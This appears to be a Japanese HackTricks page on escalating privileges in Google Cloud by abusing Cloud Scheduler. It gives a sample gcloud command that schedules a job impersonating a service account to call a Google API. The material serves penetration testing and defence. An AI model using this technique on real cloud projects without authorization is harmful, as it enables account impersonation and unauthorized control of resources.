GCP - Cloudscheduler Privesc

htARTE(HackTricks AWS Red Team Expert) でゼロからヒーローまでAWSハッキングを学ぶ

HackTricks をサポートする他の方法:

cloudscheduler

cloudscheduler.jobs.create , iam.serviceAccounts.actAs, (cloudscheduler.locations.list)

これらの権限を持つ攻撃者は、Cloud Scheduler を悪用して 特定のサービスアカウントとして cron ジョブを認証 できます。HTTP POST リクエストを作成することで、攻撃者は、ストレージバケットの作成などのアクションをサービスアカウントのアイデンティティで実行するようスケジュールできます。この方法は、スケジューラが *.googleapis.com エンドポイントを対象とし、リクエストを認証する能力 を活用し、単純な gcloud コマンドを使用して Google API エンドポイントを直接操作できるようにします。

特定のサービスアカウントを使用して新しいストレージバケットを作成する新しいジョブを作成する例として、次のコマンドを実行できます:

gcloud scheduler jobs create http test –schedule='* * * * *' –uri='https://storage.googleapis.com/storage/v1/b?project=<PROJECT-ID>' --message-body "{'name':'new-bucket-name'}" --oauth-service-account-email 111111111111-compute@developer.gserviceaccount.com –headers Content-Type=application/json

特権を昇格させるために、攻撃者は単に、指定されたサービスアカウントを偽装して、目的のAPIをターゲットとするHTTPリクエストを作成します

参考

htARTE(HackTricks AWS Red Team Expert)を使って、ゼロからヒーローまでAWSハッキングを学びましょう!

HackTricksをサポートする他の方法:

最終更新